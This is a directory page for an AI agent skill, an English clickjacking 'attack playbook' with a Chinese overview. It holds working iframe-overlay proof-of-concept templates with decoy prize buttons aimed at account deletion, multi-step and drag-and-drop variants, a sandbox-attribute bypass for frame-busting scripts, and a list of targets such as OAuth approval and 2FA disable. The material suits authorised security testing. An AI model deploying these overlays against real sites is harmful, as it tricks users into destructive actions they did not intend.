Clickjacking

作者 yaklang6fbf0bc8d5c7无许可证2.4K 个星标收录于 2026年10月8日更新于 2026年10月8日仓库3周前更新

Clickjacking playbook. Use when testing whether target pages can be framed, whether X-Frame-Options or CSP frame-ancestors are properly configured, and whether UI redress attacks can trigger sensitive actions.

仅含说明Security
AI 生成的概览

一份点击劫持测试手册,涵盖可框架性检查、绕过技术与概念验证模板。

功能
该技能提供一套结构化手册,用于测试目标网页是否可被嵌入框架,从而是否存在点击劫持(界面伪装)风险。它说明如何检查 X-Frame-Options 与 CSP frame-ancestors 响应头,如何构建单击、多步以及拖放式概念验证页面,以及如何尝试诸如 sandbox 属性绕过防框架脚本等手法。它还列出了高价值目标与测试清单。
适用场景
适用于评估网站页面能否被嵌入 iframe,以及界面伪装攻击是否可能触发敏感操作。适合针对响应头配置与点击劫持暴露面的安全测试,覆盖已认证与未认证页面。
运行要求
不附带脚本,仅为说明性内容。测试需要能够托管或提供 HTML 概念验证页面,并使用浏览器针对目标加载这些页面。

SKILL: Clickjacking — Expert Attack Playbook

AI LOAD INSTRUCTION: Clickjacking (UI redress) techniques. Covers iframe transparency tricks, X-Frame-Options bypass, CSP frame-ancestors, multi-step clickjacking, drag-and-drop attacks, and chaining with other vulnerabilities. Often a "low severity" finding that becomes critical when targeting admin actions.

1. CORE CONCEPT

Clickjacking loads a target page in a transparent iframe overlaid on an attacker's page. The victim sees the attacker's UI but clicks on the invisible target page, performing unintended actions.

html
<style>  iframe { position: absolute; top: 0; left: 0; width: 100%; height: 100%; opacity: 0.0001; z-index: 2; }  .decoy { position: absolute; top: 200px; left: 100px; z-index: 1; }</style><div class="decoy"><button>Click to win a prize!</button></div><iframe src="https://target.com/account/delete?confirm=yes"></iframe>

2. DETECTION — IS THE PAGE FRAMEABLE?

Check X-Frame-Options Header

X-Frame-Options: DENY           → cannot be framed (secure)X-Frame-Options: SAMEORIGIN     → only same-origin framing (secure for cross-origin)X-Frame-Options: ALLOW-FROM uri → deprecated, browser support inconsistent(header absent)                  → frameable! (vulnerable)

Check CSP frame-ancestors

Content-Security-Policy: frame-ancestors 'none'        → cannot be framedContent-Security-Policy: frame-ancestors 'self'         → same-origin onlyContent-Security-Policy: frame-ancestors https://a.com  → specific origin(directive absent)                                       → frameable

CSP frame-ancestors supersedes X-Frame-Options in modern browsers.

Quick PoC Test

html
<iframe src="https://target.com/sensitive-action" width="800" height="600"></iframe>

If the page loads in the iframe → frameable → potentially vulnerable.

JavaScript Frame Detection (from target page source)

javascript
// Common frame-busting code found in target pages:if (top.location.hostname !== self.location.hostname) {    top.location.href = self.location.href;}

If this code is present but not using CSP frame-ancestors, it can often be bypassed.


3. PROOF OF CONCEPT TEMPLATES

Basic Single-Click

html
<html><head><title>Free Prize</title></head><body><h1>Click the button to claim your prize!</h1><style>  iframe { position: absolute; top: 300px; left: 60px;           width: 500px; height: 200px; opacity: 0.0001; z-index: 2; }</style><iframe src="https://target.com/account/settings?action=delete"></iframe></body></html>

Multi-Step Clickjacking

For actions requiring multiple clicks (e.g., "Are you sure?" confirmation):

html
<div id="step1">  <button onclick="document.getElementById('step1').style.display='none';                    document.getElementById('step2').style.display='block';">    Step 1: Click here  </button></div><div id="step2" style="display:none">  <button>Step 2: Confirm</button></div><iframe src="https://target.com/admin/action"></iframe>

Reposition iframe for each step to align the transparent button with the decoy.

Drag-and-Drop Clickjacking

Extract data from one iframe to another using HTML5 drag-and-drop events — the victim drags across invisible iframes, transferring tokens or data.


4. BYPASS TECHNIQUES

Frame-Busting Script Bypass

Some pages use JavaScript frame-busting:

javascript
if (top !== self) { top.location = self.location; }

Bypass with sandbox attribute:

html
<iframe src="https://target.com" sandbox="allow-forms allow-scripts"></iframe><!-- sandbox without allow-top-navigation prevents frame-busting -->

X-Frame-Options ALLOW-FROM Bypass

ALLOW-FROM is not supported in Chrome/Safari. If the server relies solely on ALLOW-FROM, modern browsers ignore it → page is frameable.

Double-Framing

If X-Frame-Options: SAMEORIGIN is set, but a same-origin page exists that can be framed (without XFO), use that page as an intermediary to frame the target.


5. HIGH-IMPACT TARGETS

text
Account deletion pageEmail/password change formAdmin panel actions (add user, change role)Payment confirmationOAuth authorization ("Allow" button)Two-factor authentication disableAPI key generationWebhook configuration

6. TESTING CHECKLIST

□ Check X-Frame-Options header on sensitive pages□ Check CSP frame-ancestors directive□ Create iframe PoC and verify page loads□ Test frame-busting scripts — try sandbox attribute bypass□ Identify high-value single-click actions□ For multi-step actions, build multi-click PoC□ Test both authenticated and unauthenticated pages□ Verify ALLOW-FROM behavior across browsers

来源与署名

来源:yaklang/hack-skills位于skills/clickjacking提交6fbf0bc

许可证: 无许可证

内容归原作者所有。SourceWeft 从公开仓库中收录这些内容。

举报或申请下架